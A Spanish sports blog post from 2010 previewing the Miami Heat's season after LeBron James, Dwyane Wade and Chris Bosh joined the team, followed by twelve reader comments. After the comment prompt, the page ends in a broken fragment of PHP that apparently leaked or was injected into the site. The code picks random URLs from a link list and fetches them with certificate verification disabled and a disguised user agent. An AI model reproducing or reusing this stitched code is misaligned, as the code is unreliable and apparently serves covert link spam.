Miami Heat 2010-2011: Hot dreams, wet dreams

28 de September de 2010 por TheDeerHunter

“The Decision”. Como si de una película de intriga made in Hollywood se tratara, así fue titulada por la ESPN la cobertura especial televisiva que se hizo del momento más crítico de los últimos años de la liga, por no decir de todos los tiempos. La bomba cayó y todos los cimientos se tambalearon. Los Heat se hacen de una tacada con el premio gordo con 3 aproximaciones. Pat Riley convence nada más y nada menos que a Dwyane Wade, LeBron James y Chris Bosh para jugar juntos en su equipo, cuando apenas había contado en las quinielas para renovar con suerte al primero. El Big Three a priori más impresionante la historia.

Golpe de efecto del viejo zorro volviendo de golpe (y nunca mejor dicho) al epicentro del universo baloncestístico mundial. Mejor dicho, con todo lo que ha caído, al OJO DEL HURACÁN. Así, en mayúsculas. Es el verano más movido que recordamos, como ya se podía esperar. Algo que, sin duda, les va a los protagonistas.

Los acontecimientos se precipitan. La carta rebosante de despecho de Dan Gilbert. Las declaraciones de Jordan, Barkley… hasta de Iturriaga… De todo dios. La locura en la venta de los abonos. Todo tipo de manifestaciones a favor y en contra (predominando estas últimas). Los Heat convertidos en un extraño foco de fascinación y antipatía. Se trata de una revolución. Hay un antes y un después tras todo esto. Un antes y un después tras “The Chosen One’s decision“.

Y esto es sólo el principio. Sin pararnos a reflexionar demasiado puede parecer que es muy bonito haber cuadrado este megalómano proyecto, contar con un potencial sin precedentes para alcanzar el Olimpo. Pero no es oro todo lo que reluce. Alguno se ha convertido de la noche a la mañana en objetivo de los odios. Ahora mismo habría que tener un par de narices para ponerse en la piel de LeBron James. Kobe ya no es El enemigo. No le van a perdonar nada (si alguna vez alguien lo hizo): La supuesta traición a Cleveland, el no haberles llevado al título en solitario, el haberse puesto al servicio de Wade o jugar junto a Bosh… La grandeza es muy ingrata y el peso sobre los hombros de todos ellos va a ser muy grande. Todo el mundo está afilando las hachas y el morbo por verles caer es muy alto. Que se preparen que vienen curvas.

No vale otra cosa que el campeonato. Suena duro, pero es así. Y conviene tener presente que los Heat se merendaron su margen de maniobra en los tres contratos que ya sabemos. Sólo Mario Chalmers tenía contrato en vigor. Tras todos ellos, Riley se apresuró a renovar a Udonis Haslem, Joel Anthony, Jimmy Jones, Jamaal Magloire, Carlos Arroyo y… no lo olvidemos aunque no haya jugado ni un sólo minuto en la liga, Kenny Hasbrouck. Quitando a Haslem no podemos ni considerarlos como complementos ideales para un equipo campeón. Fueron un desastre la temporada pasada y no se espera una mejora significativa para la que se avecina.

Por contra allí nadie se rasgará las vestiduras por haber prescindido de Michael Beasley, cuya cabeza todavía andaban buscando. Mucho menos del contratazo de Jermaine Oneal, como tampoco de Daequan Cook, Dorrell Wright, Diawara, Quentin Richardson ni Rafer Alston.

La gran baza de Riley para apoyar a “La Tríada” ha sido captar al pretendido Mike Miller, Mid Level mediante. Se trata de una pieza muy versátil que les puede ayudar tanto en la dirección, como en el rebote, la anotación si hiciera falta y en la defensa. Podrá también ofrecer buenos minutos de descanso tanto a Wade como a LeBron, e incluso podría subir el balón puntualmente. Varias franquicias se lo han rifado. La única pega es que lleva un tiempo padeciendo problemas físicos, especialmente la pasada campaña. Que volviera a sufrirlos sería particularmente nocivo en una plantilla como va a ser la de los Heat este año.

A él se une una interesante nómina de veteranos por el mínimo. Ilgauskas ya no tiene piernas para resultar útil durante muchos minutos, pero le sobra experiencia y calidad. Ídem Juwan Howard, que el año pasado sorprendió positivamente ante las lesiones que desolaron el juego interior de los Blazers. Seguramente Eddie House ya no es el microondas decisivo del último título de los Celtics, pero todavía puede aportar mucho en muy distintos roles. Se habla también del postrero fichaje de Dampier. No sabemos si el mínimo atraerá a “Cazo Powa”.

Adicionalmente los Heat han incorporado desde la segunda ronda del draft al pívot Dexter Pittman junto al alero Da’Sean Butler, y al base Patrick Beverly, que el año pasado pertenecía a la disciplina del Olimpiakos. Sobra decir que, con tanta incorporación Erik Spoelstra tendrá que hacer carburar a un equipo prácticamente desde 0, con las dificultades asociadas si el objetivo es el que es.

Se podrá estar o no de acuerdo con el modelo expuesto. Se puede creer que lo que ha hecho LeBron no es lo correcto o que el hecho de que se hayan puesto de acuerdo intoxica la competición y el libre mercado. Te podrá caer mejor o peor la gomina de Riley, los shows del Elegido, las rastas de Bosh o las zapas de Wade. Lo que no se puede negar es que estamos todos con el alma en vilo para comprobar qué es lo que va a dar de sí todo esto. Si se puede construir un equipo campeón a golpe de despacho desde la nada, si va a haber balón para los 3, si LeBron se convertirá en el escudero de Wade o si Spoelstra es el más indicado para llevarlos al anillo… Muchas dudas que justo de aquí a un mes comenzarán a despejarse.

Quinteto inicial: Mario Chalmers, Dwane Wade, LeBron James, Chris Bosh, Joel Anthony
6º Hombre:
Mike Miller

Altas: Lebron James, Chris Bosh, Mike Miller, Zydrunas Ilgauskas, Juwan Howard, Eddie House, Da’Sean Butler, Dexter Pittman, Patrick Beverley,
Bajas: Michael Beasley, Rafer Alston, Jermaine O’Neal, Quentin Richarson, Daequan Cook, Yakhouba Diawara, Dorell Wright

Pronóstico: Todo lo que no sea el anillo es un fracaso, así que no podemos exigirles menos.

Comenta

12 comentarios a esta entrada

  1. Txusma dice:
    #1

    Va, ya soy el primero en decirlo. A mi me estos Heat me dan mucha rabia y la verdad casi espero que ganen los Lakers (ahí va! Lo que he dicho!)

      Citar

  2. TheDeerHunter dice:
    #2

    Xo !!

      Citar

  3. Viva_Dirk dice:
    #3

    De lo que estoy casi seguro es de que Pat Riley no va a tardar mucho en sentarse en el banquillo.

    Yo no creo que vayan a tenerlo facil en el Este, si los Celtics estan bien físicamente creo que pueden ganarlos en una serie a 7, y los Bulls también se han reforzado bien.

      Citar

  4. Rompe dice:
    #4

    Tampoco habría que olvidarse de sus vecinos de Orlando, que mantienen prácticamente el mismo bloque competitivo de las últimas temporadas. Y Howard puede hacer un auténtico destrozo al pivot de este equipo…

      Citar

  5. MagicJohnson32 dice:
    #5

    El problema del base lo pueden cubrir con Wade y James (incluso con Miller), pero lo del 5 no lo veo claro, ni aunque se traigan a Dampier. Orlando, Celtics y Lakers son equipos muy potentes en la pintura.

    Y, ante todo, suscribo lo dicho por Txus xD

      Citar

  6. Txusma dice:
    #6

    Creo que los Heat ya renunciaron a Dampier. O Dampier renunció a cobrar el mínimo… Pero vaya, que no debe ser muy difícil traerse un tronco por el mínimo para hacer faltas y medio cansar a Howard.

      Citar

  7. sergio dice:
    #7

    Supongo que ante equipos q no tenga un 5 especialmente poderoso (Atlanta, Denver, OKC, Phoenix, Dallas, Bobcats,…) podrian usar un quinteto Chalmers, Wade, Miller, James, Bosh. Asi darian descanso a los veteranos y probarian variantes en el juego (especialmente ofensivo). De hecho, creo q las variantes defensivas van a darle mas problemas ante el juego alto que la parte ofensiva. Tengo muchas ganas de ver partidos suyos a partir de mediados de Diciembre o asi… cuando empiecen a tener movimientos mecanizados y cierta quimica. Gracias a dios esta liga es larguisima y los equipos tienen tiempo de adaptarse antes de los PO

      Citar

  8. portu dice:
    #8

    Tienen mimbres de sobra para ser campeones, la plantilla me parece suficiente ya q en mi opinión el rol importante es el q desempeñan 5 titulares y 3 suplentes… lo q pueda aportar el 10º hombre de Orlando o Boston frente a lo q pueda aportar el 10º hombre de Miami a mi me parece totalemnte intrascendente. Esos 8 tíos son más q solventes: Chalmers-Wade-Lebron-Bosh-Ilgauskas-MM-Haslem-J. Anthony. Tb existe sufiente complementariedad y suficiente versatilidad para tener soluciones en defensa y en atque. Lo del Este lo veo casi pan comido pero contra LA ya será otro cantar… ahí sí q el juego interior de LA puede machacar a Miami si están sanos Odom-Pau-Bynum. Y no he hablado a prpósito de posible contratiempo el juego interior de Celtics pq a mi modo de ver no es un juego interior tan potente: los O´Neal están de vuelta de todo, KG lleva dos años malos y no parece q con un año más vaya a mejorar, Perkins es un leñador y estará mucho tiempo fuera, a G. Davis lo puede controlar Bosh por velocidad y altura… sinceramente, los nombres de Boston podrían asustar pero luego creo q la realidad puede alejarse mucho de las expectativas creadas por esos nombres.

      Citar

  9. Jabho dice:
    #9

    Yo no le tengo especial mania a los Heat y si mucho interes en verles. Creo que estan obligados a hacerlo muy bien este año y ganar desde el que viene a poco que incoporen a un tipo grande con la mid-level. Si tienen buena química, y parece que si, y no sacan los egos ya tienen mucho ganado.

    Como dice Portu los Heat deberían pasearse ante todos salvo Celtics (si llegan bien) y Lakers… pero vamos con ese equipo la ausencia de un 5 potente sólo se notará al final del camino y ya veremos.

      Citar

  10. kantonyo dice:
    #10

    Yo creo que los Heat son un equipazo, y sin duda seran el rival a batir en el Este. Apuesto a que tendrán una liga regular muy comoda y probablemente sean primeros con bastante margen. Esta comodidad puede volverse en su contra, por falta de competitividad.

    En los playoffs es donde deberan demostrar si son un equipo campeón. Boston, Orlando en la conferencia Este y sobre todo Los Angeles Lakers en el Oeste son los únicos capaces de apartarlos de la victoria.

      Citar

  11. myguelon dice:
    #11

    Veo a Boston y a Orlando mejores como bloque. Si alguna de las 3 estrellas no está al 100% en playoff por exceso de minutos en Regular Season, no les veo llegando a la final contra Lakers.

      Citar

  12. estalin dice:
    #12

    miami heat puede ser campeon pero con, Pat Riley como dirigentes de el equipos de miami heat.
    yo creo que ya estas bueno que miami heat cigas pendiendo. ese equipos de miami heat es de mas ciado equipos para ese dirigentes. yo creo del mi puntos de vista, que Pat Riley puede hacer un mejor trabajo. y miami heat compeon.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>